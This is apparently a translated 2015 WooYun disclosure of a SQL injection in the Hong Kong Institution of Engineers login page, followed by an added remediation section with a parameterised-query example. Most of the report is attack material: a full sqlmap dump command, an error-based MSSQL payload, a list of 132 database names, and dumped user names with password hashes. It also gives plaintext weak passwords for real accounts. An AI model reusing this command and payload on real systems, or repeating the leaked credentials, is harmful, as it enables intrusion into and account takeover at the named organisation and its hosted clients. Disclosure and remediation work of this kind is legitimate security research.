
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0145928

Title: The Hong Kong Institution of Engineers has a POST-type SQL injection vulnerability + weak back-end passwords (132 databases) (Hong Kong region)

Related vendor: hkcert (Hong Kong Computer Emergency Response Team Coordination Centre)

Author: 路人甲

Submitted: 2015-10-12 09:54

Fixed: 2015-11-29 17:44

Published: 2015-11-29 17:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organisation (hkcert) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2015-10-12: details sent to the vendor, awaiting vendor handling
2015-10-15: vendor confirmed; details visible to the vendor only
2015-10-25: details disclosed to core white hats and domain experts
2015-11-04: details disclosed to regular white hats
2015-11-14: details disclosed to intern white hats
2015-11-29: details disclosed to the public

Brief description:

The Hong Kong Institution of Engineers has a SQL injection vulnerability + weak back-end passwords (132 databases)

Detailed description:

Tested with sqlmap.
Test URL: http://**.**.**.**/login.aspx

python sqlmap.py -u "http://**.**.**.**/login.aspx" --form --batch -p UsrID --technique=E -D HKIE_AC -T tb_Usr -C Usr_name,Usr_pwd --dump


Weak passwords:
1. jimmy:00000000
2. W C LO:drwclo

Proof of vulnerability:

---
Parameter: UsrID (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJNzc3OTI0NjM5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIYnRubG9naW79t+jTuJcfBVV7mqLjckooBfnAsg==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQK7643hCAL1sK+0CwLmmdGVDALIvNOaAQKC3IfLCZn65Pt3vL2j2d/jloghC1RnzTlm&UsrID=nSUi' AND 7221=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7221=7221) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(113))) AND 'RNLY'='RNLY&Pwd=&Organizer=RWwO&btnlogin.x=1&btnlogin.y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


available databases [132]:
[*] AIC
[*] ATCACC_ATM
[*] ATCACC_ATM1
[*] ATCACC_ATM2
[*] ATCACC_ATM3
[*] ATCACC_ATM_Global
[*] ATCACC_ATMI
[*] ATCACC_BJ
[*] ATCACC_BJ01
[*] ATCACC_BVI
[*] ATCACC_CD
[*] ATCACC_CQ
[*] ATCACC_DL
[*] ATCACC_DL01
[*] ATCACC_GZ
[*] ATCACC_GZ01
[*] ATCACC_HK
[*] ATCACC_QD
[*] ATCACC_QD01
[*] ATCACC_SH
[*] ATCACC_SH01
[*] ATCACC_SSH
[*] ATCACC_SZ
[*] ATCACC_TJ
[*] ATCACC_TJ01
[*] ATCACC_TW
[*] ATCACC_XI
[*] ATCACC_XI01
[*] ATCMaster
[*] Baby
[*] bsp
[*] BspGbl
[*] chaumet
[*] CheerArt
[*] chm
[*] clinique
[*] COLON_CONTENT_CMT
[*] COLON_CONTENT_CMT1
[*] COLON_CONTENT_CMT3
[*] epdweee
[*] Forums_OZ
[*] FTMltd
[*] goldsource
[*] guess_test
[*] guess_travel
[*] Guesshandbags
[*] hierarchy
[*] HKBA
[*] HKBA_20150122_Bak
[*] HKBA_data
[*] hkba_help
[*] hkba_web
[*] hkba_web2
[*] HKBA_WEB_Live
[*] hkba_web_uat
[*] hkba_webtest
[*] HkbaAccount
[*] HKBAFocus
[*] HKBAWEB
[*] HKElectric
[*] HKElectric_uat
[*] HKIE-FEdigest
[*] HKIE_AC
[*] HKIE_AMC
[*] HKIE_BD
[*] hkie_bk
[*] HKIE_BM
[*] HKIE_BS
[*] HKIE_BS_DynamicMenu
[*] HKIE_CA
[*] HKIE_CMT
[*] HKIE_CPDS
[*] HKIE_CV
[*] HKIE_CV_20131029
[*] HKIE_CV_TEST
[*] HKIE_EG
[*] HKIE_EG_TEST
[*] HKIE_Electrical
[*] HKIE_Electrical_new
[*] HKIE_EN
[*] HKIE_EV
[*] HKIE_EV_ForEVTestWebSite
[*] HKIE_FE
[*] HKIE_FE_Copy20100108
[*] HKIE_FE_ForFETestWebSite
[*] HKIE_LT
[*] HKIE_MC
[*] HKIE_MC_backUpAt2010_03_12
[*] HKIE_MI
[*] HKIE_MT
[*] HKIE_NE
[*] HKIE_NE_Bak_2009_11_30
[*] HKIE_SSC
[*] HKIE_ST
[*] HKIE_TEMP_DB
[*] hkie_YMC
[*] hkmta
[*] HLS
[*] hls_temp
[*] HLSnew
[*] imss
[*] imsseuq
[*] innoways_edm
[*] jimmy
[*] kifung_CMT
[*] Kingdom_CMT
[*] master
[*] MMS
[*] mms_test
[*] model
[*] msdb
[*] mta_test
[*] nano
[*] OP-2
[*] op_intranet_new
[*] origins_quota
[*] PCCW_CTRWS
[*] PCCW_CTRWS_CHK
[*] pccw_quota
[*] pccw_quota_sim
[*] policy_demo
[*] processis
[*] QASWEB_TEMP
[*] superdefense
[*] t-marketing
[*] tempdb
[*] Vanny
[*] Vote
[*] wellonmedical
[*] WineDining
[*] wontrad
[*] wuyishan


Database: HKIE_AC
[16 tables]
+-----------------------+
| tb_DocUpload          |
| tb_Event              |
| tb_EventGroupType     |
| tb_LeftMenu           |
| tb_LeftSubMenu        |
| tb_News               |
| tb_PageContent        |
| tb_PageContentSetting |
| tb_PastSession        |
| tb_PastSessionType    |
| tb_Photo              |
| tb_PhotoAlbum         |
| tb_S_Doc              |
| tb_S_DocType          |
| tb_Usr                |
| tb_event_reply_from   |
+-----------------------+


Table: tb_Usr
[10 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| Crt_by     | varchar  |
| Crt_dte    | datetime |
| Email_adds | varchar  |
| Is_Enable  | char     |
| Staff_name | varchar  |
| Tel        | varchar  |
| Update_by  | varchar  |
| Update_dte | datetime |
| Usr_name   | varchar  |
| Usr_pwd    | varchar  |
+------------+----------+


Table: tb_Usr
[3 entries]
+----------+--------------------------+
| Usr_name | Usr_pwd                  |
+----------+--------------------------+
| jimmy    | 3Ush6e9x4SkRg6RrkTrm8g== |
| W C LO   | CJgGly+9rN5dcsNjmlEeJw== |
| admin    | H0SAi4swyo2o6p1FTf1U+w== |
+----------+--------------------------+

Remediation:

Add input filtering.

Copyright notice: credit the source when reposting: 路人甲@乌云
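The root cause shown by the sqlmap output is that the POST field UsrID is pasted into the SQL text of the login query, so a quote in it ends the string literal and the rest is parsed as SQL; the MSSQL CONVERT error then carries the selected data back to the client. The durable fix is a parameterised query rather than filtering. The following is an added illustration, not code from the affected site or from this report: the original application is ASP.NET on Microsoft SQL Server, and this stand-in uses Python's bundled sqlite3 so it runs offline. The table and column names (tb_Usr, Usr_name, Usr_pwd) come from the report; the rows, password values and helper names are constructed for the example.

```python
"""Vulnerable vs. parameterised login lookup (added example, not the site's code)."""
import sqlite3

# Constructed sample data: the user names from the report with placeholder
# password values. The real stored values are not reproduced here.
SAMPLE_USERS = [
    ("jimmy", "PLACEHOLDER_HASH_1"),
    ("W C LO", "PLACEHOLDER_HASH_2"),
    ("admin", "PLACEHOLDER_HASH_3"),
]

# The injected UsrID value from the report's sqlmap output, trimmed to the part
# that matters: a closing quote, an AND condition calling an MSSQL function,
# and a trailing condition that re-balances the quotes.
REPORT_PAYLOAD = "nSUi' AND 7221=CONVERT(INT,(SELECT CHAR(113))) AND 'RNLY'='RNLY"


def make_db():
    """In-memory SQLite stand-in for the HKIE_AC database (assumption: schema
    reduced to the two columns the report dumped)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_Usr (Usr_name VARCHAR(50), Usr_pwd VARCHAR(50))")
    conn.executemany("INSERT INTO tb_Usr VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, usr_id):
    """Mirrors the defect: the POST field is concatenated into the SQL text,
    so a quote in it ends the literal and the remainder is parsed as SQL."""
    sql = "SELECT Usr_pwd FROM tb_Usr WHERE Usr_name = '" + usr_id + "'"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, usr_id):
    """Hardened form: the value is bound as a parameter and never becomes part
    of the SQL text, whatever characters it contains."""
    sql = "SELECT Usr_pwd FROM tb_Usr WHERE Usr_name = ?"
    return conn.execute(sql, (usr_id,)).fetchone()


def classify(conn, lookup, usr_id):
    """Return 'row', 'none' or 'db-error' for one lookup.

    A database error raised by user-controlled input is exactly the signal
    error-based injection relies on: on MSSQL the CONVERT failure message
    contains whatever the injected subquery selected. With the bound
    parameter the same input is just an unknown user name.
    """
    try:
        return "row" if lookup(conn, usr_id) else "none"
    except sqlite3.Error:
        return "db-error"


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", vulnerable_lookup), ("parameterised", safe_lookup)):
        print(name, "jimmy ->", classify(db, fn, "jimmy"))
        print(name, "payload ->", classify(db, fn, REPORT_PAYLOAD))
```

In the ASP.NET application itself the equivalent is a SqlCommand whose SQL text uses a named placeholder (for example @UsrID) with the value supplied through SqlParameter, and no string concatenation of request fields. Detail-level database error messages should also not reach the HTTP response, since that is the channel the error-based technique depends on, and the weak credentials listed above need a password policy independent of the injection fix.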


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed at: 2015-10-15 17:42

Vendor reply:

The relevant organisation has been contacted to handle it.

Latest status:

None yet

